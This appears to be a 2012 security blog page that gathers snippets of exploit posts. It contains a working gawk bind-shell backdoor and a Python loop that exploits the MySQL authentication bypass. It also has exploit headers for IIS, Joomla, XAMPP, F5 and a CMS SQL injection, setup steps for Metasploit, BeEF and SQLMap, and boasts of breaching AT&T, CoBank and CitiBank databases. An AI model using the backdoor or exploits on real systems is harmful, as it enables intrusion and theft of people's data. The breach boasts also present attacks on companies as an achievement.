MultiObfuscator 2.00

Please download this app. from Source.

MultiObfuscator is a professional cryptography tool that offers double
encryption, csprng based scrambling, csprng based whitening, and more.
Documentation provided.


Source: http://packetstormsecurity.org/files/114693

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

A Backdoor in gawk by thegrugg

BEGIN {
     port = 8080
     prompt = "bkd> "
     
    service = "/inet/tcp/" port "/0/0"
    while(1){
           do {
                 printf prompt |& service
                 service |& getline cmd
                 if(cmd) {
                       while((cmd |& getline) > 0)
                             print $0 |& service
                       close(cmd)
                 } 
           }

Hacked Joomla! v. [1.6.x] [1.7.x] [2.5.0-2.5.2] - Escalation of Privileges

This vulnerability allows us to escalate privileges joomla for registering a new user, for 1.6.x/1.7.x versions have not been issued so far no patch versions and 1.0.x/1.5.x/2.5.3 + are not vulnerable. but for our comfort the v. 1.5.x (which is not patched) joomla has the well-known bug of the token, you can change the admin pass, well that's another topic.




Let us focus on our own and

Wordpress all Version full Path Disclosure Vulnerability By KinG Of PiraTeS

================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \

================================================================================
##

DNS Changer ทำงานยังไงกันแน่

เป็นประเด็นค่อนข้างมากกับเรื่อง Malware ที่ชือว่า DNS Changer วันนี้ขอหยิบยกมาพูดหน่อยละกันครับ

ก่อนที่จะรู้ว่า DNS Changer ทำงานยังไง เรามาดูก่อนดีกว่าว่า DNS คืออะไรครับ

DNS คืออะไร
โดยปกติแล้วการเข้าไปใช้งานเว็บไซด์ต่างๆ จะไม่ได้ติดต่อกันด้วยชื่อของเว็บไซด์อย่าง www.facebook.com, www.google.com หรอกนะ เพราะการเชื่อมต่อเน็ตเวิร์คต่างๆทำด้วย IP Address ส่วนชื่อเว็บไซด์(domain name)

Interesting exploit, Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service

If you want to see the exploit code, please go to the Source.


# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core

Using beef plugin with Metasploit

1. Run the beef service
$/pentest/web/beef/beef -x -v

2. In another console, Run the Metasploit Console
$msfconsole

3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git

4. Move file beef.rb to msf/plugins and lib/beef to msf/lib

5. Install hpricot gem
$gem install hpricot

6. In the Metasploit console,

finddomains - discovering domain names/web sites/virtual hosts

FindDomains is a multithreaded search engine discovery tool that will be very useful for penetration testers dealing with discovering domain names/web sites/virtual hosts which are located on too many IP addresses. Provides a console interface so you can easily integrate this tool to your pentest automation system.It retrieves domain names/web sites which are located on specified ip address/

AT&T And Hostgator was hack.

<==============================>Target: ATT.comVulnerable Link: REDACTEDVuln. Type: Error-BasedVulnerable paramater: sb=DB: prod<==============================>Well; it just goes to show you, anything is vulnerable. You just have to know where to look. This DB has A LOT of information in it: names, addresses, mobile numbersect..  The information in this dump isn't even 1% of whats in here, I just

CoBank & CitiBank - Internal Access - Hacked!

// c0mrade    // 6-17-12    // Twitter.com/officialcomrade         Hello, my minions. Let me start off by answering some questions.         Q. Do you support Jester?    A. Yes. I do not support the dilettante that follows him around though. They're trying to act as some corporate spies. It's funny. Jester has that part of the scene on lock. Don't even try mining it, please.         Q. Why is your

XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities

$------------------------------------------------------------------------------------------------------------$ XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities $ Author : Sangteamtham $ Home : Hcegroup.net $ Download :http://www.apachefriends.org/en/xampp-windows.html $ Date :06/07/2012 $ Twitter: http://twitter.com/Sangte_amtham$***********************************************

F5 BIG-IP remote root authentication bypass Vulnerability (Update Link and payload for Metasploit)

F5 BIG-IP remote root authentication bypass VulnerabilityCVE reference: CVE-2012-1493Affected platforms: BIG-IP platforms without SCCPVersion: 11.x 10.x 9.xDate: 2012-February-16Security risk: HighVulnerability: F5 BIG-IP remote root authentication bypassResearcher: Florent DaigniereVendor Status: Notified / Patch availableVulnerability Disclosure Policy: https://www.trustmatta.com/advisories/

Interesting Vulnerability Today(2012-06-11) Microsoft IIS 6.0, Microsoft IIS 7.5

THIS IS A GENUINE ISOWAREZ RELEASE********************************************************------------------------------------------------------------------------------------------------------------------------------------------------------------Title: Microsoft IIS 6.0 with PHP installed Authentication BypassAffected software:Microsoft IIS 6.0 with PHP installed(tested on Windows Server 2003 SP1

MySQL Authen Bypass Vulnerability On Ubuntu (*update python script)

 This vulnerability was public by @hdmoore, @jcran, @jduck1337 and another security expert guys from my twitter.

This vulnerability effects on Ubuntu/Debian 32/64bit, MySQL 5.5.22 not work on RHEL/CentOS5 and 6 (x86_64)

Python script for this vulnerability

#!/usr/bin/pythonimport subprocesswhile 1:        subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait(

Details here:

LinkedIn Leaked hashes password statistics

LinkedIn Leaked hashes password statistics (@StefanVenken)         Based on the leaked 6.5 Million hashes,    1.354.946 were recovered within a few hours time with HashCat / Jtr and publicly found wordlists on a customer grade laptop.         This report was created with pipal from @Digininja         Total entries = 1354946    Total unique entries = 1354946         Top 10 base words    link =

Your LinkedIn password is in the news or not?

Last night, the password(SHA1) of LinkedIn was leaked and if you want to know your password is in the list or not, try this script(from Phobos Technology) for check it. 

if you want to see full details of this news, please go to the Source.

1. Download Password from
http://wordpress.phobostechnology.com/wp-content/uploads/2012/06/combo_not.zip

2. Run this python script.

"""
Save this file as

Simple Web Content Management System SQL Injection

If you want all vulnerability of this post, please go to the Source.

####################################################################################### Exploit Title: Simple Web Content Management System SQL Injection# Date: May 30th 2012# Author: loneferret# Version: 1.1# Application Url: http://www.cms-center.com/# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23############

Metasploit 4 on iPhone 4S & iPad 2

# Install basic toolsapt-get update apt-get dist-upgrade apt-get install wget subversion# Download correct version of ruby and dependencies wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.debwget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.debwget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb# Install them dpkg -i iconv_1.14-1_iphoneos-arm.debdpkg

How to use SQLMap POST Request Injection

If you want to see the original post, please go to the Source. 

1. Browse to target site that have form.
2. You can use any intercept proxy to intercept Request from your web browser like Burp, OWASP Zed, etc.
3. Click the button of the form in that web page.
4. Capture and save the Request into the file. [post.txt]
5. Run SQLMap with option -r to read the post.txt to get the information to

Automating SQLMap with data from wapiti By Brandon Perry

 This version was modified to use in Backtrack 5 R2(ruby1.9.4dev), if you want the original version, please go to the Source.

You must to save this script in wapiti path.

#!/usr/bin/env ruby#require 'active_support/secure_random'require 'securerandom'require 'rexml/document'wapiti_path = '/pentest/web/wapiti/'sqlmap_path = '/pentest/database/sqlmap-dev/'wapiti_report_path = '/tmp/wapiti_report